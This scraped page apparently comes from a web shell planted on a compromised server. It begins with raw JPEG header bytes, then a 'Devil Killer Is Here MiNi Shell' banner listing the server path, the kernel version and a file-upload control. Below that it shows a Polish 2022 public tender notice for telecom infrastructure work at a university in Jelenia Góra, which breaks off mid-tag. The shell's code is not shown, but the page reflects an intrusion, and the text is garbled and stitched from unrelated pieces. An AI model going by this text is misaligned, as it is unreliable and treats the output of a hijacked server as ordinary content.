JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220801/0028613101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja infrastruktury telekomunikacyjnej Karkonoskiej Akademii Nauk Stosowanych w Jeleniej Górze </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Karkonoska Akademia Nauk Stosowanych w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230480619</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Lwówecka 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-506</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756453300</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rektorat@kans.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kans.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja infrastruktury telekomunikacyjnej Karkonoskiej Akademii Nauk Stosowanych w Jeleniej Górze </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e52f906-1183-11ed-a35f-e2885ab918a3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00286131</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00225483/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja sieci światłowodowej Karkonoskiej Akademii Nauk Stosowanych w Jeleniej Górze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.kans.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym składanie Ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń, odbywa się przy użyciu środków<br/>komunikacji elektronicznej tj.: Platformy Zamówień Publicznych ZETOPZP: https://pzp.kans.pl/,<br/>poczty elektronicznej: marta.zdeb@kans.pl<br/>2. Korzystanie z Platformy jest bezpłatne.<br/>3. Osobą uprawnioną do porozumiewania się z Wykonawcami w imieniu Zamawiającego jest: Marta Zdeb tel. 75 64 53 318, e-mail:<br/>marta.zdeb@kans.pl<br/>4. Instrukcja Użytkownika - korzystania z Platformy znajduje się na Portalu, w zakładce „Pomoc”,<br/>https://pzp.kans.pl/#/help<br/>5. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta na Platformie Zamówień Publicznych PZP,<br/>akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie<br/>internetowej http://pzp.kans.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6. Ogólne zasady korzystania z Platformy:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie http://pzp.kans.pl/#/authentication/login<br/>2) Wykonawca, aby przystąpić do postępowania musi założyć konto na<br/>Platformie http://pzp.kans.pl/#/authentication/register , gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny, a następnie ustanawia hasło;<br/>3) Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy<br/>podać dane firmy, którą osoba zakładająca konto reprezentuje.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym, a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy i powiadomień mailowych.<br/>7. Zamawiający, zgodnie z art. 67 Ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz.U. z 2021 r. poz. 1129) określa następujące wymagania techniczne<br/>i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej<br/>przy wykorzystaniu Platformy, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram,<br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 10 , Mac Os<br/>x 10.4, Linux, lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej<br/>wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>6) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej<br/>przez wystawcę certyfikatu używanego przez Wykonawcę do podpisywania<br/>składanych dokumentów;<br/>8. Zamawiający, zgodnie z §11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie<br/>(Dz.U. z 2020 r. poz. 2452) podaje następujące informacje na temat specyfikacji<br/>połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu<br/>przekazania i odbioru danych:<br/>1) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w<br/>formatach: .doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff,<br/>.xades, .sig,<br/>2) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez<br/>Wykonawcę na Platformie Zamówień Publicznych PZP i zapisany, widoczny jest w<br/>Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>składania ofert;<br/>9. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest<br/>synchronizowany ze znacznikiem czasu UTC.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1) administratorem danych osobowych<br/>Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest Zamawiający; 2)<br/>Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach<br/>dotyczących przetwarzania danych osobowych pod adresem e-mail: iod@kpswjg.pl; 3) Dane osobowe<br/>Wykonawców i osób uczestniczących w przedmiotowym postępowaniu przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówienia publicznego; 4) Odbiorcami danych osobowych Wykonawców i osób uczestniczących w<br/>przedmiotowym postępowaniu będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>5) dane osobowe osób uczestniczących w przedmiotowym postępowaniu będą przechowywane,<br/>zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy lub też przez okres dłuższy w przypadku postępowań<br/>finansowanych ze środków unijnych (okres trwałości projektu); 6) obowiązek podania przez<br/>Wykonawcę danych osobowych bezpośrednio jego dotyczących oraz danych osób uczestniczących w<br/>postępowaniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do danych osobowych osób<br/>uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) osoby uczestniczące w przedmiotowym postępowaniu posiadają:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych bezpośrednio ich dotyczących. b)<br/>na podstawie art. 16 RODO prawo do sprostowania przez Wykonawcę uczestniczącego w<br/>przedmiotowym postępowaniu danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego). Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych dotyczących wykonawców i uczestników przedmiotowego<br/>zamówienia narusza przepisy RODO;<br/>9) nie przysługuje Wykonawcy i osobom uczestniczącym w przedmiotowym postępowaniu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawców i osób uczestniczących w przedmiotowym postępowaniu jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAT-2151-4/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 206000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest modernizacja infrastruktury telekomunikacyjnej Karkonoskiej Akademii Nauk Stosowanych w Jeleniej Górze, realizowana w systemie zaprojektuj i wybuduj. W zakresie ww. modernizacji jest zaprojektowanie i wykonanie instalacji, zakres obejmuje min. zadania:<br/>a) opracowanie dokumentacji projektowej dla modernizowanej infrastruktury telekomunikacyjnej (światłowodowej sieci komputerowej, telefonicznej telefonii VoIP) w zakresie i na warunkach określonych w Programie Funkcjonalno-<br/>Użytkowym (PFU) stanowiącym Załącznik nr 2 do SWZ;<br/>b) uzyskanie aprobaty Zamawiającego na opracowaną dokumentację projektową przed przystąpieniem do realizacji robót budowlanych instalacyjnych;<br/>c) dostawę urządzeń, materiałów i osprzętu o parametrach określonych w PFU do miejsca eksploatacji;<br/>d) wykonanie robót budowlanych instalacyjnych infrastruktury telekomunikacyjnej i światłowodowej zgodnie z opracowaną i zatwierdzoną przez Zamawiającego dokumentacją projektową wraz z dostawą i instalacją urządzeń sieciowych w zakresie<br/>i na warunkach określonych w PFU;<br/>e) wykonanie dokumentacji powykonawczej wdrożonych instalacji i systemów;<br/>f) przeprowadzenie procedur odbiorowych zgodnie z wymaganiami producentów,<br/>określonymi w dokumentacji projektowej oraz obowiązującymi przepisami prawa w celu umożliwienia eksploatacji;<br/>g) wszelkie inne czynności, bez których nie można należycie wykonać Przedmiotu Zamówienia, w tym dokonania wymaganych prawem zgłoszeń i uzyskania niezbędnych pozwoleń, o ile takie zgłoszenia lub pozwolenia okażą się konieczne;<br/>h) wykonanie geodezyjnej inwentaryzacji powykonawczej sieci będących w zakresie Przedmiotu Zamówienia i zgłoszenie do zasobów geodezji i kartografii m. Jeleniej Góry;<br/>i) udzielenie Zamawiającemu gwarancji na Przedmiot Zamówienia; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">32400000-7 - Sieci</p> <p class="mb-0">32560000-6 - Tworzywa z włókna optycznego</p> <p class="mb-0">45314100-2 - Instalowanie central telefonicznych</p> <p class="mb-0">45314200-3 - Instalowanie linii telefonicznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">32421000-0 - Okablowanie sieciowe</p> <p class="mb-0">32424000-1 - Infrastruktura sieciowa</p> <p class="mb-0">32428000-9 - Modernizacja sieci</p> <p class="mb-0">32429000-6 - Sprzęt sieci telefonicznej</p> <p class="mb-0">32562000-0 - Kable światłowodowe</p> <p class="mb-0">32562100-1 - Kable światłowodowe do przesyłu informacji</p> <p class="mb-0">32562200-2 - Światłowodowe kable telekomunikacyjne</p> <p class="mb-0">32562300-3 - Światłowodowe kable do przesyłu danych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający zastosuje 2 kryteria oceny ofert, którymi są „cena” oraz „okres gwarancji”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczą:<br/>2.1 zdolności do występowania w obrocie gospodarczym,<br/>Wykonawca- operator telekomunikacyjny- przedstawi Zamawiającemu aktywny wpis/zaświadczenie do rejestru przedsiębiorców telekomunikacyjnych prowadzony przez<br/>Prezesa Urzędu Komunikacji Elektronicznej.<br/>2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, Zamawiający nie stawia szczegółowego warunku<br/>2.3 sytuacji ekonomicznej lub finansowej,<br/>Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 200.000,00 zł.<br/>2.4 zdolności technicznej lub zawodowej.<br/>a) Wykonawca spełni warunek jeżeli wykaże, że:<br/>Wykonawca-firma budowlana: wykonał jedną robotę budowlaną o wartości co najmniej 150000,00 zł, w zakresie instalacji teletechnicznej, niskoprądowej, telekomunikacyjnej lub<br/>światłowodowej, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane oraz załączyć dowody określające, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Dla wartości wykazanych przez Wykonawcę w walucie<br/>innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu z tabeli A Narodowego Banku Polskiego dla danej waluty z dnia wszczęcia niniejszego postępowania (tj. z dnia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych), wzór stanowi<br/>załącznik nr 7a do SWZ.<br/>Wykonawca- operator telekomunikacyjny- wykaże, że prowadzi nieprzerwanie działalność telekomunikacyjną przez 5 lat przed upływem terminu składania ofert i przedstawi Zamawiającemu aktywny wpis/zaświadczenie do rejestru przedsiębiorców<br/>telekomunikacyjnych prowadzony przez Prezesa Urzędu Komunikacji Elektronicznej, wydane na podstawie art.11 w zw. z art.10 ustawy z dnia 16 lipca 2004r. – Prawo telekomunikacyjne (Dz.U. z 2021 r. poz. 576) oraz oświadczy, że realizuję budowy<br/>infrastruktury telekomunikacyjnej, światłowodowej, instalacji niskoprądowej lub sieciowej jako Inwestor, na potrzeby swoich Klientów, działając przy tym w oparciu o ww. Ustawę. Wzór oświadczenia stanowi załącznik nr 7b do SWZ.<br/>b) Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował, co najmniej 1 osobą, która pełnić będzie funkcję kierownika budowy lub kierownika robót, posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji elektrycznych, elektroenergetycznych lub w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń bez ograniczeń lub ważne uprawnienia im odpowiadające, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa; Mając na uwadze obowiązujące w Polsce przepisy prawa krajowego, w przypadku osób<br/>spoza Polski możliwe jest uzyskanie decyzji w sprawie uznania kwalifikacji zawodowych, nabytych w Państwach Członkowskich UE, po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce, na zasadach<br/>określonych w ustawie z dnia 22 grudnia 2015r. (t.j. Dz. U. z 2021 poz. 1646) o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Wzór stanowi załącznik nr 8 do SWZ. <h3 